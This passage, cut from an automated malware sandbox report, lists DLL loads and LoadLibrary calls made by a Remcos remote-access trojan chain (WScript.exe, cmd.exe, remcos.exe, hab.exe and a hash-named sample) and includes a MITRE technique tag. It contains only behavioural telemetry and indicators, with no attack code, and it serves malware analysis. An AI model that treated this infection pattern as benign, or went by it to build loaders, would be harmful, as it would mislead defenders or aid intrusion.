\"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WScript.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69870000\n \"WScript.exe\" loaded module \"SXS.DLL\" at base 74c40000\n \"WScript.exe\" loaded module \"DWMAPI.DLL\" at base 73ac0000\n \"WScript.exe\" loaded module \"CLBCATQ.DLL\" at base 75200000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VBSCRIPT.DLL\" at base 6ae20000\n \"WScript.exe\" loaded module \"OLE32.DLL\" at base 753b0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 75070000\n \"WScript.exe\" loaded module \"WINTRUST.DLL\" at base 74e70000\n \"WScript.exe\" loaded module \"CRYPTSP.DLL\" at base 74740000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 744d0000\n \"WScript.exe\" loaded module \"ADVAPI32.DLL\" at base 75070000\n \"WScript.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c30000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 70640000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPT32.DLL\" at base 74ea0000\n \"WScript.exe\" loaded module \"IMM32.DLL\" at base 75f70000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6c620000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6ba00000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6b3f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6b310000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHOM.OCX\" at base 6b060000\n \"WScript.exe\" loaded module \"SHELL32.DLL\" at base 76090000\n \"WScript.exe\" loaded module \"PROPSYS.DLL\" at base 73870000\n \"WScript.exe\" loaded module \"COMCTL32.DLL\" at base 73c00000\n \"WScript.exe\" loaded module \"OLEAUT32.DLL\" at base 75ed0000\n \"WScript.exe\" loaded module \"APPHELP.DLL\" at base 74be0000\n \"WScript.exe\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 69ef0000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"WScript.exe\" loaded module \"SETUPAPI.DLL\" at base 75a10000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73870000\n \"WScript.exe\" loaded module \"NTMARTA.DLL\" at base 741a0000\n \"WScript.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75130000\n \"WScript.exe\" loaded module \"PROFAPI.DLL\" at base 74d40000\n \"WScript.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 74e40000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76ce0000\n \"WScript.exe\" loaded module \"SECUR32.DLL\" at base 74a70000\n \"WScript.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74e30000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74be0000\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74be0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73ae0000\n \"remcos.exe\" loaded module \"OLEAUT32.DLL\" at base 75ed0000\n \"remcos.exe\" loaded module \"SXS.DLL\" at base 74c40000\n \"remcos.exe\" loaded module \"CRYPTSP.DLL\" at base 74740000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 744d0000\n \"remcos.exe\" loaded module \"ADVAPI32.DLL\" at base 75070000\n \"remcos.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c30000\n \"remcos.exe\" loaded module \"DWMAPI.DLL\" at base 73ac0000\n \"remcos.exe\" loaded module \"COMCTL32\" at base 73c00000\n \"remcos.exe\" loaded module \"UXTHEME.DLL\" at base 73ae0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 753b0000\n \"remcos.exe\" loaded module \"CLBCATQ.DLL\" at base 75200000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 75290000\n \"remcos.exe\" loaded module \"SHELL32\" at base 76090000\n \"remcos.exe\" loaded module \"KERNEL32\" at base 756f0000\n \"remcos.exe\" loaded module \"NTDLL\" at base 76e30000\n \"remcos.exe\" loaded module \"IPHLPAPI\" at base 73090000\n \"remcos.exe\" loaded module \"ADVAPI32\" at base 75070000\n \"remcos.exe\" loaded module \"DHCPCSVC.DLL\" at base 72f20000\n \"remcos.exe\" loaded module \"IPHLPAPI.DLL\" at base 73090000\n \"remcos.exe\" loaded module \"RPCRT4.DLL\" at base 75150000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74be0000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70210000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6ae50000\n \"remcos.exe\" loaded module \"OLE32.DLL\" at base 753b0000\n \"remcos.exe\" loaded module \"PROPSYS.DLL\" at base 73870000\n \"remcos.exe\" loaded module \"COMCTL32.DLL\" at base 73c00000\n \"remcos.exe\" loaded module \"SHELL32.DLL\" at base 76090000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73870000\n \"remcos.exe\" loaded module \"NTMARTA.DLL\" at base 741a0000\n \"remcos.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75130000\n \"remcos.exe\" loaded module \"PROFAPI.DLL\" at base 74d40000\n \"remcos.exe\" loaded module \"APPHELP.DLL\" at base 74be0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6dd60000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76090000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"remcos.exe\" loaded module \"SETUPAPI.DLL\" at base 75a10000\n \"remcos.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 74e40000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76ce0000\n \"remcos.exe\" loaded module \"SECUR32.DLL\" at base 74a70000\n \"remcos.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74e30000\n \"remcos.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 710f0000\n \"hab.exe\" loaded module \"MSVCP60.DLL\" at base 6b430000\n \"WScript.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6be40000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 720c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6c600000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6bf20000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6ba00000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6b470000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHOM.OCX\" at base 6b440000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70210000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 756f0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hab.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70210000\n \"hab.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hab.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hab.exe\" loaded module \"MSVCP60.DLL\" at base 6b440000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73ae0000\n \"WScript.exe\" loaded module \"RPCRT4.DLL\" at base 75150000\n \"WScript.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75130000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 720b0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6dcb0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6c610000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6bf20000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6ba00000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHOM.OCX\" at base 6b480000\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6be40000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003504)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCP60.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WINMM.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Psapi.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004488)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004488)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005392)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005392)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00005488)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005656)\n 